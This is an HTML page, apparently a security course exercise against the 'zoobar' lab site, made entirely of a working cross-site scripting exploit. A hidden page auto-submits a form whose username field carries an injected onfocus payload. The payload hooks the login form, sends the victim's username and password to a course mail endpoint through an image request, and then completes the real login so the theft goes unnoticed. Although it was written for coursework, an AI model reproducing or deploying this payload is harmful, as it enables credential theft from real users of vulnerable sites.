<!DOCTYPE html>
<html>
<script>
function attack()
{
	document.getElementById("myFormUsername").value = "a " +
	"onfocus=eval(\"" +
	"document.login_form.loginusername.value='';" +
	"image=document.createElement('img');" +
//	"email_done=0;"
	"submit_handler=function(frame_event)" +
		"{" +
//		"if(email_done>0){return;}"
		"frame_event.preventDefault();" +
		"image.src='http://ece568.csl.toronto.edu/a3/sendmail.php?'+'to=mukher23'+'&netid=mukher23'+'&payload='+document.login_form.loginusername.value+','+document.login_form.loginpassword.value+'&random='+Math.random();" +
//		"email_done++;"
		"};" +
	"image.onerror=function(){" +
	"document.login_form.removeEventListener('submit',submit_handler);" +
	"document.login_form.submitlogin.click();" +
	"};" +
	"document.login_form.addEventListener('submit',submit_handler);" +
	"\");"
	;
	document.getElementById("myFormPassword").value = "";
	document.getElementById("myForm_0").submit();
}
</script>
<body style="display:none">
	<form method="POST" name="myForm" id="myForm_0" action="http://zoobar.csl.toronto.edu/users.php">
	<input type="submit" name="submitlogin" value="submit">
	<input type="text" name="loginusername" id="myFormUsername">
	<input type="password" name="loginpassword" id="myFormPassword">
	</form>
	<script>
		attack();
	</script>
</body>
</html>
